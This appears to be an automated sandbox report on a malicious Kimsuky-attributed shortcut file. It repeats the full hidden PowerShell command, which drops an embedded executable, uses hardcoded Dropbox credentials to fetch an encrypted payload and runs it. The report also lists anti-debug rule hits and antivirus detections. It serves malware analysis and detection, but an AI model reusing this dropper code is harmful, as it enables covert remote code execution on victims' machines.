command_line: "C:\Windows\system32\cmd.exe" /c powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = 'C:\Users\test22\AppData\Local\Temp';$lnkpath = Get-ChildItem *.lnk;foreach ($path in $lnkpath) { if ($path.length -eq 0x00103CFB) { $lnkpath = $path;}}foreach ($item in $lnkpath) { $lnkpath = $item.Name;}$InputStream = New-Object System.IO.FileStream($lnkpath, [IO.FileMode]::Open, [System.IO.FileAccess]::Read);$file=New-Object Byte[]($InputStream.length);$len=$InputStream.Read($file,0,$file.Length);$InputStream.Dispose();write-host \"readfileend\";$path = $lnkpath.substring(0,$lnkpath.length-4);$len1 = 1057132;$len2 = 1062657;$len3 = 1062657;$temp = New-Object Byte[]($len2-$len1);write-host \"exestart\";for($i=$len1; $i -lt $len2; $i++) { $temp[$i-$len1] = $file[$i]};sc $path ([byte[]]$temp) -Encoding Byte;write-host \"exeend\";$temp = New-Object Byte[]($file.Length-$len3);for($i=$len3; $i -lt $file.Length; $i++) { $temp[$i-$len3] = $file[$i]}; $encData_b64 = Start-Process -FilePath $path;[System.IO.File]::Delete($lnkpath);Function Decode-Binary { param( [Parameter(Position = 0, Mandatory = $True)] [byte[]] $binary,[Parameter(Position = 1, Mandatory = $True)] [long] $len) [int[]] $poly = @(0, 3, 29, 37, 73);$poly_n = 4;$poly_ord = 73; [byte[]] $ran_state = New-Object byte[] ($poly_ord + 1);for ($i = 0; $i -lt $poly_ord + 1; $i++){ $ran_state[$i] = 1; if ($i -lt $len){ $ran_state[$i] = [byte](($len % ($i + 1)) -band 1);}}for ($i = 0; $i -lt $len; $i++) { for ($j = 1; $j -lt $poly_n; $j++) { $ran_state[$i % $poly_ord] = $ran_state[$i % $poly_ord] -bxor $ran_state[($i + $poly[$j]) % $poly_ord]; } for ($j = 0; $j -lt 8; $j++) { $binary[$i] = $binary[$i] -bxor [byte]((($ran_state[$j] -bxor ($ran_state[($i * ($j + 1)) % $poly_ord] -band $ran_state[(($i + $j) * ($j + 1)) % $poly_ord])) -shl $j));}} return $len } $clientID = \"x2f7205ajf3knq9\";$clientSecret = \"mz2vl6yajc2rpy2\";$refreshToken = 
\"1G9ctDOJDPUAAAAAAAAAAZYmjGqbo7QXmh9lu_K5JcgYq7UVVP5hXcGJn1v4slGa\";$body = @{grant_type=\"refresh_token\";refresh_token=$refreshToken;client_id=$clientID;client_secret=$clientSecret};$tokenEndpoint = \"https://api.dropboxapi.com/oauth2/token\";$response = Invoke-RestMethod -Uri $tokenEndpoint -Method Post -Body $body;if ($response.access_token) {$accessToken = $response.access_token;}$downloadUrl = \"https://content.dropboxapi.com/2/files/download\";$remoteFilePath = \"/0528/ps.bin\";$request = [System.Net.HttpWebRequest]::Create($downloadUrl);$request.Method = \"POST\";$request.Headers.Add(\"Authorization\", \"Bearer $accessToken\");$request.Headers.Add(\"Dropbox-API-Arg\", '{\"path\": \"' + $remoteFilePath + '\"}');$response = $request.GetResponse();$receiveStream = $response.GetResponseStream();if ($receiveStream -ne $null) {$streamReader = New-Object System.IO.StreamReader($receiveStream);$memoryStream = New-Object System.IO.MemoryStream;$buffer = New-Object byte[] 1024;$read = 0;do { $read = $receiveStream.Read($buffer, 0, $buffer.Length);$memoryStream.Write($buffer, 0, $read);} while ($read -gt 0);$enc_bytes = $memoryStream.ToArray();Decode-Binary ($enc_bytes) ($enc_bytes.Length);$newString = [System.Text.Encoding]::UTF8.GetString($enc_bytes);iex $newString;$memoryStream.Close();$streamReader.Close();};$receiveStream.Close();$response.Close();"
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000340
1 1 0

CreateProcessInternalW

thread_identifier: 2364
thread_handle: 0x00000084
process_identifier: 2356
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = 'C:\Users\test22\AppData\Local\Temp';$lnkpath = Get-ChildItem *.lnk;foreach ($path in $lnkpath) { if ($path.length -eq 0x00103CFB) { $lnkpath = $path;}}foreach ($item in $lnkpath) { $lnkpath = $item.Name;}$InputStream = New-Object System.IO.FileStream($lnkpath, [IO.FileMode]::Open, [System.IO.FileAccess]::Read);$file=New-Object Byte[]($InputStream.length);$len=$InputStream.Read($file,0,$file.Length);$InputStream.Dispose();write-host \"readfileend\";$path = $lnkpath.substring(0,$lnkpath.length-4);$len1 = 1057132;$len2 = 1062657;$len3 = 1062657;$temp = New-Object Byte[]($len2-$len1);write-host \"exestart\";for($i=$len1; $i -lt $len2; $i++) { $temp[$i-$len1] = $file[$i]};sc $path ([byte[]]$temp) -Encoding Byte;write-host \"exeend\";$temp = New-Object Byte[]($file.Length-$len3);for($i=$len3; $i -lt $file.Length; $i++) { $temp[$i-$len3] = $file[$i]}; $encData_b64 = Start-Process -FilePath $path;[System.IO.File]::Delete($lnkpath);Function Decode-Binary { param( [Parameter(Position = 0, Mandatory = $True)] [byte[]] $binary,[Parameter(Position = 1, Mandatory = $True)] [long] $len) [int[]] $poly = @(0, 3, 29, 37, 73);$poly_n = 4;$poly_ord = 73; [byte[]] $ran_state = New-Object byte[] ($poly_ord + 1);for ($i = 0; $i -lt $poly_ord + 1; $i++){ $ran_state[$i] = 1; if ($i -lt $len){ $ran_state[$i] = [byte](($len % ($i + 1)) -band 1);}}for ($i = 0; $i -lt $len; $i++) { for ($j = 1; $j -lt $poly_n; $j++) { $ran_state[$i % $poly_ord] = $ran_state[$i % $poly_ord] -bxor $ran_state[($i + $poly[$j]) % $poly_ord]; } for ($j = 0; $j -lt 8; $j++) { $binary[$i] = $binary[$i] -bxor [byte]((($ran_state[$j] -bxor ($ran_state[($i * ($j + 1)) % $poly_ord] -band $ran_state[(($i + $j) * ($j + 1)) % $poly_ord])) -shl $j));}} return $len } $clientID = \"x2f7205ajf3knq9\";$clientSecret = \"mz2vl6yajc2rpy2\";$refreshToken = \"1G9ctDOJDPUAAAAAAAAAAZYmjGqbo7QXmh9lu_K5JcgYq7UVVP5hXcGJn1v4slGa\";$body = 
@{grant_type=\"refresh_token\";refresh_token=$refreshToken;client_id=$clientID;client_secret=$clientSecret};$tokenEndpoint = \"https://api.dropboxapi.com/oauth2/token\";$response = Invoke-RestMethod -Uri $tokenEndpoint -Method Post -Body $body;if ($response.access_token) {$accessToken = $response.access_token;}$downloadUrl = \"https://content.dropboxapi.com/2/files/download\";$remoteFilePath = \"/0528/ps.bin\";$request = [System.Net.HttpWebRequest]::Create($downloadUrl);$request.Method = \"POST\";$request.Headers.Add(\"Authorization\", \"Bearer $accessToken\");$request.Headers.Add(\"Dropbox-API-Arg\", '{\"path\": \"' + $remoteFilePath + '\"}');$response = $request.GetResponse();$receiveStream = $response.GetResponseStream();if ($receiveStream -ne $null) {$streamReader = New-Object System.IO.StreamReader($receiveStream);$memoryStream = New-Object System.IO.MemoryStream;$buffer = New-Object byte[] 1024;$read = 0;do { $read = $receiveStream.Read($buffer, 0, $buffer.Length);$memoryStream.Write($buffer, 0, $read);} while ($read -gt 0);$enc_bytes = $memoryStream.ToArray();Decode-Binary ($enc_bytes) ($enc_bytes.Length);$newString = [System.Text.Encoding]::UTF8.GetString($enc_bytes);iex $newString;$memoryStream.Close();$streamReader.Close();};$receiveStream.Close();$response.Close();"
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000088
1 1 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
cmdline "C:\Windows\system32\cmd.exe" /c powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = 'C:\Users\test22\AppData\Local\Temp';$lnkpath = Get-ChildItem *.lnk;foreach ($path in $lnkpath) { if ($path.length -eq 0x00103CFB) { $lnkpath = $path;}}foreach ($item in $lnkpath) { $lnkpath = $item.Name;}$InputStream = New-Object System.IO.FileStream($lnkpath, [IO.FileMode]::Open, [System.IO.FileAccess]::Read);$file=New-Object Byte[]($InputStream.length);$len=$InputStream.Read($file,0,$file.Length);$InputStream.Dispose();write-host \"readfileend\";$path = $lnkpath.substring(0,$lnkpath.length-4);$len1 = 1057132;$len2 = 1062657;$len3 = 1062657;$temp = New-Object Byte[]($len2-$len1);write-host \"exestart\";for($i=$len1; $i -lt $len2; $i++) { $temp[$i-$len1] = $file[$i]};sc $path ([byte[]]$temp) -Encoding Byte;write-host \"exeend\";$temp = New-Object Byte[]($file.Length-$len3);for($i=$len3; $i -lt $file.Length; $i++) { $temp[$i-$len3] = $file[$i]}; $encData_b64 = Start-Process -FilePath $path;[System.IO.File]::Delete($lnkpath);Function Decode-Binary { param( [Parameter(Position = 0, Mandatory = $True)] [byte[]] $binary,[Parameter(Position = 1, Mandatory = $True)] [long] $len) [int[]] $poly = @(0, 3, 29, 37, 73);$poly_n = 4;$poly_ord = 73; [byte[]] $ran_state = New-Object byte[] ($poly_ord + 1);for ($i = 0; $i -lt $poly_ord + 1; $i++){ $ran_state[$i] = 1; if ($i -lt $len){ $ran_state[$i] = [byte](($len % ($i + 1)) -band 1);}}for ($i = 0; $i -lt $len; $i++) { for ($j = 1; $j -lt $poly_n; $j++) { $ran_state[$i % $poly_ord] = $ran_state[$i % $poly_ord] -bxor $ran_state[($i + $poly[$j]) % $poly_ord]; } for ($j = 0; $j -lt 8; $j++) { $binary[$i] = $binary[$i] -bxor [byte]((($ran_state[$j] -bxor ($ran_state[($i * ($j + 1)) % $poly_ord] -band $ran_state[(($i + $j) * ($j + 1)) % $poly_ord])) -shl $j));}} return $len } $clientID = \"x2f7205ajf3knq9\";$clientSecret = \"mz2vl6yajc2rpy2\";$refreshToken = 
\"1G9ctDOJDPUAAAAAAAAAAZYmjGqbo7QXmh9lu_K5JcgYq7UVVP5hXcGJn1v4slGa\";$body = @{grant_type=\"refresh_token\";refresh_token=$refreshToken;client_id=$clientID;client_secret=$clientSecret};$tokenEndpoint = \"https://api.dropboxapi.com/oauth2/token\";$response = Invoke-RestMethod -Uri $tokenEndpoint -Method Post -Body $body;if ($response.access_token) {$accessToken = $response.access_token;}$downloadUrl = \"https://content.dropboxapi.com/2/files/download\";$remoteFilePath = \"/0528/ps.bin\";$request = [System.Net.HttpWebRequest]::Create($downloadUrl);$request.Method = \"POST\";$request.Headers.Add(\"Authorization\", \"Bearer $accessToken\");$request.Headers.Add(\"Dropbox-API-Arg\", '{\"path\": \"' + $remoteFilePath + '\"}');$response = $request.GetResponse();$receiveStream = $response.GetResponseStream();if ($receiveStream -ne $null) {$streamReader = New-Object System.IO.StreamReader($receiveStream);$memoryStream = New-Object System.IO.MemoryStream;$buffer = New-Object byte[] 1024;$read = 0;do { $read = $receiveStream.Read($buffer, 0, $buffer.Length);$memoryStream.Write($buffer, 0, $read);} while ($read -gt 0);$enc_bytes = $memoryStream.ToArray();Decode-Binary ($enc_bytes) ($enc_bytes.Length);$newString = [System.Text.Encoding]::UTF8.GetString($enc_bytes);iex $newString;$memoryStream.Close();$streamReader.Close();};$receiveStream.Close();$response.Close();"
cmdline powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = 'C:\Users\test22\AppData\Local\Temp';$lnkpath = Get-ChildItem *.lnk;foreach ($path in $lnkpath) { if ($path.length -eq 0x00103CFB) { $lnkpath = $path;}}foreach ($item in $lnkpath) { $lnkpath = $item.Name;}$InputStream = New-Object System.IO.FileStream($lnkpath, [IO.FileMode]::Open, [System.IO.FileAccess]::Read);$file=New-Object Byte[]($InputStream.length);$len=$InputStream.Read($file,0,$file.Length);$InputStream.Dispose();write-host \"readfileend\";$path = $lnkpath.substring(0,$lnkpath.length-4);$len1 = 1057132;$len2 = 1062657;$len3 = 1062657;$temp = New-Object Byte[]($len2-$len1);write-host \"exestart\";for($i=$len1; $i -lt $len2; $i++) { $temp[$i-$len1] = $file[$i]};sc $path ([byte[]]$temp) -Encoding Byte;write-host \"exeend\";$temp = New-Object Byte[]($file.Length-$len3);for($i=$len3; $i -lt $file.Length; $i++) { $temp[$i-$len3] = $file[$i]}; $encData_b64 = Start-Process -FilePath $path;[System.IO.File]::Delete($lnkpath);Function Decode-Binary { param( [Parameter(Position = 0, Mandatory = $True)] [byte[]] $binary,[Parameter(Position = 1, Mandatory = $True)] [long] $len) [int[]] $poly = @(0, 3, 29, 37, 73);$poly_n = 4;$poly_ord = 73; [byte[]] $ran_state = New-Object byte[] ($poly_ord + 1);for ($i = 0; $i -lt $poly_ord + 1; $i++){ $ran_state[$i] = 1; if ($i -lt $len){ $ran_state[$i] = [byte](($len % ($i + 1)) -band 1);}}for ($i = 0; $i -lt $len; $i++) { for ($j = 1; $j -lt $poly_n; $j++) { $ran_state[$i % $poly_ord] = $ran_state[$i % $poly_ord] -bxor $ran_state[($i + $poly[$j]) % $poly_ord]; } for ($j = 0; $j -lt 8; $j++) { $binary[$i] = $binary[$i] -bxor [byte]((($ran_state[$j] -bxor ($ran_state[($i * ($j + 1)) % $poly_ord] -band $ran_state[(($i + $j) * ($j + 1)) % $poly_ord])) -shl $j));}} return $len } $clientID = \"x2f7205ajf3knq9\";$clientSecret = \"mz2vl6yajc2rpy2\";$refreshToken = \"1G9ctDOJDPUAAAAAAAAAAZYmjGqbo7QXmh9lu_K5JcgYq7UVVP5hXcGJn1v4slGa\";$body = 
@{grant_type=\"refresh_token\";refresh_token=$refreshToken;client_id=$clientID;client_secret=$clientSecret};$tokenEndpoint = \"https://api.dropboxapi.com/oauth2/token\";$response = Invoke-RestMethod -Uri $tokenEndpoint -Method Post -Body $body;if ($response.access_token) {$accessToken = $response.access_token;}$downloadUrl = \"https://content.dropboxapi.com/2/files/download\";$remoteFilePath = \"/0528/ps.bin\";$request = [System.Net.HttpWebRequest]::Create($downloadUrl);$request.Method = \"POST\";$request.Headers.Add(\"Authorization\", \"Bearer $accessToken\");$request.Headers.Add(\"Dropbox-API-Arg\", '{\"path\": \"' + $remoteFilePath + '\"}');$response = $request.GetResponse();$receiveStream = $response.GetResponseStream();if ($receiveStream -ne $null) {$streamReader = New-Object System.IO.StreamReader($receiveStream);$memoryStream = New-Object System.IO.MemoryStream;$buffer = New-Object byte[] 1024;$read = 0;do { $read = $receiveStream.Read($buffer, 0, $buffer.Length);$memoryStream.Write($buffer, 0, $read);} while ($read -gt 0);$enc_bytes = $memoryStream.ToArray();Decode-Binary ($enc_bytes) ($enc_bytes.Length);$newString = [System.Text.Encoding]::UTF8.GetString($enc_bytes);iex $newString;$memoryStream.Close();$streamReader.Close();};$receiveStream.Close();$response.Close();"
Process injection Process 3048 resumed a thread in remote process 1784
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000338
suspend_count: 1
process_identifier: 1784
1 0 0
option -nop value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -noninteractive value Prevents creating an interactive prompt for the user
option -nop value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -noninteractive value Prevents creating an interactive prompt for the user
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
Skyhigh BehavesLike.Dropper.tx
VIPRE Heur.BZC.YAX.Boxter.781.B4AAC4E8
Arcabit Heur.BZC.YAX.Boxter.781.B4AAC4E8
Symantec Scr.Mallnk!gen13
ESET-NOD32 LNK/Kimsuky.I
Avast LNK:Agent-EW [Trj]
Kaspersky HEUR:Trojan.Multi.Agent.gen
BitDefender Heur.BZC.YAX.Boxter.781.B4AAC4E8
MicroWorld-eScan Heur.BZC.YAX.Boxter.781.B4AAC4E8
Rising Trojan.PSRunner/LNK!1.DB7E (CLASSIC)
Emsisoft Trojan.PowerShell.Gen (A)
FireEye Heur.BZC.YAX.Boxter.781.B4AAC4E8
Sophos Troj/LnkObf-T
MAX malware (ai score=89)
Kingsoft Script.Troj.BigLnk.22142
ZoneAlarm HEUR:Trojan.Multi.Agent.gen
GData Heur.BZC.YAX.Boxter.781.B4AAC4E8
AhnLab-V3 Downloader/LNK.Generic
VBA32 Trojan.Link.Crafted
SentinelOne Static AI - Suspicious LNK
Fortinet LNK/Kimsuky.GOSU!tr
AVG LNK:Agent-EW [Trj]